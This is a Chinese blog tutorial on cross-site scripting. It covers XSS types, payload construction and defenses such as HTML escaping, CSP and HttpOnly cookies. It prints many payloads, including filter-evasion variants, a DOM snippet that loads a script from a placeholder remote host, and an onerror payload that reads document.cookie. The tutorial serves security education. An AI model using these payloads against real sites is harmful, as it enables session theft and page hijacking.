XSS构造与防御

最新推荐文章于 2024-08-16 18:08:04 发布
最新推荐文章于 2024-08-16 18:08:04 发布
阅读量2.5k 收藏 3
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrgglxy/article/details/83183645
版权

XSS原理

  • xss概念
    xss又叫css(cross site scripting,跨站脚本攻击),xss攻击通过在web页面插入恶意脚本,当页面被浏览时,恶意脚本会被执行,实现攻击用户的目的。
  • xss类型
    1、存储型/持久型
    存储型指恶意脚本会被存储在服务器端,如数据库中或者文件中。例如留言板等很容易因为输入检验不严谨导致被攻击。
    2、反射型/非持久型
    反射型一般是带有恶意脚本参数的URL,是一次性的。
    3、DOM型
    基于DOM文档对象模型的xss漏洞,客户端的恶意脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。可能触发DOM型xss的属性有document.write、innerHTML、location、window.name、document.referer等。

XSS构造方法

1、利用html标记<>进行操作
这是最简单的利用方式,如:

<script>alert(1);</script>
<script>prompt(1)</script>
<iframe src="javascript:alert(1)">

2、利用html标签属性
利用html标签支持js伪协议形式,如src,href,background、value、action、lowsrc、bgsound、dynsrc等,进行xss注入。如:

<img src="javascript:alert(1);"/>
<table background="javascript:alert(1);"></table>

3、事件利用
可以利用html中某些动作事件,绑定恶意脚本。常用的事件有mouseover、onclick、onfocus、onerror、onload、onchange等,具体见:html事件属性

<input type="button" value="click me" onclick="alert(1)" />

4、利用css跨站
css样式表可作为恶意脚本载体,不需要嵌入html中,可以通过link或者@import进行引用,比较隐蔽,不过不同浏览器之间不能通用。

<div style="background-image:url(javascript:alert(1))"></div>
<style>
    body{background-image:url(javascript:alert(1));}
     //expression中可使用全角字符
    p{background-image:expression(alert(1));}
    <style>@import'javascript:alert('xss');'</style>
</style>

5、规避过滤规则
可利用大小写混淆、拼接和拆分(空格回车和tab绕过)、字符编码等方式,如:

<scRiPt>alert(1);</scrIPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src="javas		cript:alert(1);"/>//语句必须完整,有分号或者标签对。
//可以将代码用ASCII码替换,也可十进制、十六进制、八进制编码
<img src="javascrip#116&#58alert(1)" />
<a href=&quot;#javascript:alert(&#39;xss&#39;)&quot;>xss</a>
//拆分,可绕过长度限制
<script>z='document.'</script>
<script>z=+'write'("'</script>
<script>z=z+'<script'</script>
......
<script>eval(z)</script>

6、DOM方法利用

var s=document.createElement("script");
s.src="http://xxx/xxx.js";
document.getElementsByTagName("head")[0].appendChild(s);

7、location方法利用
利用location加JavaScript伪代码,将“符号”、“变量名”、“函数名” 都变成字符串,在字符串中可以使用js编码,构造payload。

<input type="button" value="click me" name=javascript:alert%281%29" onfocus=location=this.name />
<img src="1" onerror=location="javascr"+"ipt:al"+"ert%28docu"+"ment.co"+"okie%29">

以上几种构造方法结合使用会让恶意脚本更难辨识。

XSS防御措施

  • 字符检验过滤
    合理利用正则表达式,过滤,iframe,script,<>,javascript,空格,引号、&等
  • php中过滤方法
    1.htmlspecialchars函数,将字符内容转化为html实体
    2.htmlentities函数
    3.HTMLPurifier.auto.php插件
    4.RemoveXss函数
    5.addslashes() 函数,返回在预定义字符之前添加反斜杠的字符串。
    6.strip_tags() 函数,剥去字符串中 HTML、XML 以及 PHP 标签。
  • 输出html时,加上Content Security Policy的Http Header,可防止页面被XSS攻击时,嵌入第三方的脚本文件等
  • 设置Cookie时,加上HttpOnly参数
  • 开发API时,检验请求的Referer参数
  • ……

总结

前端,后端都要对输入、输出作校验,一定不能信任每一个输入,也不能放过每一个输出。

幸福女孩小鲤鱼_lizzy
关注
专栏目录
Web安全系列(四):XSS防御
AzulSystems的博客
02-19 395
XSS防御很复杂,并不是一套防御机制就能就解决的问题,它需要具体业务具体实现。目前来说,流行的浏览器内都内置了一些 XSS 过滤器,但是这只能防御一部分常见的 XSS,而对于网站来说,也应该一直寻求优秀的解决方案,保护网站及用户的安全,我将阐述一下网站在设计上该如何避免 XSS 的攻击。
web安全之XSS攻击及防御pdf
08-25
#### 七、XSS构造 ##### 7.1 绕过XSS-Filter的方法 为了提高XSS攻击的成功率,攻击者常常采用一些技巧来绕过Web应用程序的过滤机制。以下是一些常见的绕过方法: - **利用HTML标签**:通过使用特定的HTML标签来...
XSS攻击及防御
热门推荐
寻道
11-29 20万+
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893,转载请注明。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的H...
XSS-跨站脚本攻击
最新发布
qq_64177395的博客
08-16 2955
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS类型反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
XSS防御
weixin_40270125的博客
04-27 1万+
XSS防御是复杂的。流行的浏览器都内置了一些对抗XSS的措施,比如Firefox的CSP,Noscript扩展,IE8内置的XSS Filter等。而对于网站来说,也应该寻找优秀的解决方案,保护用户不被XSS攻击。 1)HttpOnly HttpOnly最早是由微软提出,并在IE 6中实现的,至今已成为一个标准。浏览器将禁止页面的JavaScript访问带有HttpOnly属性的Coo...
XSS漏洞类型原理及防御方式
weixin_54786196的博客
10-15 1001
XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
xss的防护措施有哪些
dexunjiaqiang的博客
07-09 2305
XSS指利用网站漏洞从用户那里恶意盗取信息。
XSS攻击与防御全面指南
这篇文档是关于XSS(跨站脚本)攻击和防御的详细指南,由Xylitol撰写,主要涵盖了XSS的基础知识,攻击构造防御策略以及各种攻击技巧。XSS是一种常见的网络安全问题,它利用了网站对用户输入验证不足的漏洞,允许...
XSS攻击与防御手册:全面解析Web安全
这本《XSS - 攻擊與防禦手冊》详细介绍了XSS攻击的原理、方法以及防御策略,由网络安全专家Xylitol撰写。 第一章 – 什么是XSSXSS是指攻击者在网页中插入恶意脚本,当用户访问这些被篡改的网页时,恶意脚本会在...
XSS跨站脚本攻击剖析与防御
04-03
- 钓鱼攻击:利用XSS构造仿冒页面,引导用户输入敏感信息,如用户名、密码等。 - 跨站请求伪造(CSRF):XSS可以辅助CSRF攻击,让受害者在不知情的情况下执行操作,如转账、更改设置等。 3. **XSS攻击实例**: -...
XSS攻击与防御
08-08 1474
<br />XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它 用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的phi
XSS攻击防御
07-06 271
2 XSS攻击防御    2.1 XSS的传统防御技术    2.1.1 基于特征的防御    XSS漏洞和着名的SQL注入漏洞一样,都是利用了Web页面的编写不完善,所以每一个漏洞所利用和针对的弱点都不尽相同。这就给XSS漏洞防御带来了困难:不可能以单一特征来概括所有XSS攻击。    传统XSS防御多采用特征匹配方式,在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击,采用的模式匹配方...
xss防御措施
tumi
04-28 1391
1、编码    (对用户输入的数据进行HTML Entity编码)2、过滤    (移除用户上传的DOM属性,如 onerror,onclick等;移除用户上传的Style节点、Script节点、Iframe节点等)3、校正     (避免直接对HTML Entity编码;使用DOM Parse转换,校正不配对的DOM标签)...
XSS 防御方法总结
一起记录GIS学习
07-21 4623
1.XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户访问网页时在其浏览器中进行执行。攻击者通过插入的脚本的执行,来获得用户的信息,比如cookie,发送到攻击者自.
XSS如何防范
qq_45803050的博客
11-27 8298
XSS如何防范 题意分析 在 Web 安全领域中,XSS 和 CSRF 是最常见的攻击方式。下面我们首先简单了解一下什么是 XSS 和 CSRF 。 XSS,即 Cross Site Script,中译是跨站脚本攻击;其原本缩写是 CSS,但为了和层叠样式表(Cascading Style Sheet)有所区分,因而在安全领域叫做 XSSXSS 攻击是指攻击者在网站上注入恶意的客户端代码,通过恶意脚本对客户端网页进行篡改,从而在用户浏览网页时,对用户浏览器进行控制或者获取用户隐私数据的一种攻击方式。攻击者
web安全防御xss
默翁的博客
04-09 625
一.定义 注入脚本,篡改页面内容,破坏页面完整结构 二.XSS的攻击方式 反射型存储型 反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器,服务器解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码,这个过程像一次反射,所以叫做反射型。 存储型:存储型XSS和反射型XSS的差别仅仅在于,提交的代码会存储在服务器端(数据库,
XSS漏洞类型原理及防御方式_三种xss漏洞防御,扫地阿姨看完都学会了
2401_84434936的博客
04-17 1327
DOM中有很多对象,其中一些是用户可以操纵的,如URI ,location,refelTer等。DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式,DOM-XSS简单理解就是不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题。可以看到js代码再次执行了,留言列表也出现了,我们的js脚本存放再列表中,当我们进入页面时,浏览器会解析页面,列表中的数据也会被解析,那js脚本被解析就会执行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值